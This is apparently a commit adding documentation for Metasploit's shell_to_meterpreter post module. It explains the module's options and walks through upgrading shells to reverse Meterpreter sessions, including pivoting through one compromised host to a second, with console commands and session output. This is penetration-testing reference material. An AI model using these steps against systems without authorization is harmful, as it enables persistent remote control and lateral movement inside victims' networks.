|
| 1 | +shell_to_meterpreter allows you to upgrade a shell session to Meterpreter. It can be launched as |
| 2 | +a post module, or from the sessions command. By default, this module will use a reverse |
| 3 | +Meterpreter. |
| 4 | + |
| 5 | +## Important Options |
| 6 | + |
| 7 | +**HANDLER** |
| 8 | + |
| 9 | +The handler option is for starting a multi/handler to receive the connection. By default this is |
| 10 | +true, because you will need it. But if for some reason if you're setting one separately, you may |
| 11 | +want to consider having it as false. |
| 12 | + |
| 13 | +**LHOST** |
| 14 | + |
| 15 | +The LHOST option is for the reverse Meterpreter you are upgrading to. By default, the module can |
| 16 | +figure it out for you. But over a pivot, you will need to manually set this, because session |
| 17 | +objects don't necessarily have that information. |
| 18 | + |
| 19 | +**LPORT** |
| 20 | + |
| 21 | +The LPORT option is also for the reverse Meterpreter you are upgrading to. |
| 22 | + |
| 23 | +**PAYLOAD_OVERRIDE** |
| 24 | + |
| 25 | +This is an advanced option. If you don't want to use the default reverse Meterpreter, then you can |
| 26 | +use this. |
| 27 | + |
| 28 | +## Scenarios |
| 29 | + |
| 30 | +**Using sessions -u** |
| 31 | + |
| 32 | +```sessions -u``` is the same as running the post module against a specific session. However, this |
| 33 | +is limited to using the default reverse Meterpreter payload, so you will not be able to use it |
| 34 | +via a pivot. |
| 35 | + |
| 36 | +Usage is rather simple. At the msf prompt, first off, read the sessions table to see which one you |
| 37 | +want to upgrade: |
| 38 | + |
| 39 | +``` |
| 40 | +msf > sessions |
| 41 | +
|
| 42 | +Active sessions |
| 43 | +=============== |
| 44 | +
|
| 45 | + Id Type Information Connection |
| 46 | + -- ---- ----------- ---------- |
| 47 | + 1 shell windows 192.168.146.1:4444 -> 192.168.146.128:1204 (192.168.146.128) |
| 48 | +
|
| 49 | +msf > |
| 50 | +``` |
| 51 | + |
| 52 | +In this demonstration, session 1 is a shell, so we upgrade that: |
| 53 | + |
| 54 | +``` |
| 55 | +msf > sessions -u 1 |
| 56 | +``` |
| 57 | + |
| 58 | +**Upgrading a shell via a pivot** |
| 59 | + |
| 60 | +This scenario is a little tricky, because the default options won't work over a pivot. The problem |
| 61 | +is that if you got a session with a bindshell, your LHOST will say "Local Pipe". And if you got it |
| 62 | +with a reverse shell, the LHOST is actually an IP range. Neither is an acceptable format for the |
| 63 | +LHOST option. |
| 64 | + |
| 65 | +There are two ways you can choose: either you must manually set LHOST, or you could choose a |
| 66 | +bind Meterpreter. The second is really easy, all you need to do is ```set PAYLOAD_OVERRIDE```. |
| 67 | + |
| 68 | +If you prefer to manually set LHOST, this should be the compromised host you're pivoting from. |
| 69 | +Perhaps a digram will help to explain this: |
| 70 | + |
| 71 | +``` |
| 72 | +|-------------| |-------------------| |-------------------| |
| 73 | +| Attacker | <---> | Compromised box A | <---> | Compromised box B | |
| 74 | +|-------------| |-------------------| |-------------------| |
| 75 | + 192.168.146.1 192.168.146.128 |
| 76 | + 192.168.1.101 (VPN) 192.168.1.102(VPN) |
| 77 | +``` |
| 78 | + |
| 79 | +In this example, let's start with breaking into box A (192.168.146.128): |
| 80 | + |
| 81 | +``` |
| 82 | +[*] Sending stage (957999 bytes) to 192.168.146.128 |
| 83 | +[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.128:1208) at 2016-04-28 22:45:09 -0500 |
| 84 | +
|
| 85 | +meterpreter > |
| 86 | +``` |
| 87 | + |
| 88 | +We decide that box A is on a VPN, with IP 192.168.1.101. Also, we found box B as 192.168.1.102. We |
| 89 | +need to create that pivot: |
| 90 | + |
| 91 | +``` |
| 92 | +msf > route add 192.168.1.1 255.255.255.0 1 |
| 93 | +[*] Route added |
| 94 | +``` |
| 95 | + |
| 96 | +And we break into box B (192.168.1.102) with a Windows bind shell: |
| 97 | + |
| 98 | +``` |
| 99 | +[*] Command shell session 2 opened (Local Pipe -> Remote Pipe) at 2016-04-28 22:47:03 -0500 |
| 100 | +``` |
| 101 | + |
| 102 | +Notice this says "Local Pipe", which means the box B's session object doesn't really know box A's IP. |
| 103 | +If you try to run shell_to_meterpreter this way, this is all you get: |
| 104 | + |
| 105 | +``` |
| 106 | +msf post(shell_to_meterpreter) > run |
| 107 | +
|
| 108 | +[*] Upgrading session ID: 2 |
| 109 | +[-] LHOST is "Local Pipe", please manually set the correct IP. |
| 110 | +[*] Post module execution completed |
| 111 | +``` |
| 112 | + |
| 113 | +To upgrade box B's shell, set LHOST to box A's 192.168.1.101. And that should connect correctly: |
| 114 | + |
| 115 | +``` |
| 116 | +msf post(shell_to_meterpreter) > run |
| 117 | +
|
| 118 | +[*] Upgrading session ID: 2 |
| 119 | +[*] Starting exploit/multi/handler |
| 120 | +[*] Started reverse TCP handler on 192.168.1.101:4433 via the meterpreter on session 1 |
| 121 | +[*] Starting the payload handler... |
| 122 | +[*] Sending stage (957999 bytes) to 192.168.1.102 |
| 123 | +[-] Powershell is not installed on the target. |
| 124 | +[*] Command stager progress: 1.66% (1699/102108 bytes) |
| 125 | +... |
| 126 | +[*] Command stager progress: 100.00% (102108/102108 bytes) |
| 127 | +[*] Meterpreter session 3 opened (192.168.146.1-192.168.146.128:4433 -> 192.168.1.102:1056) at 2016-04-28 22:50:56 -0500 |
| 128 | +``` |
0 commit comments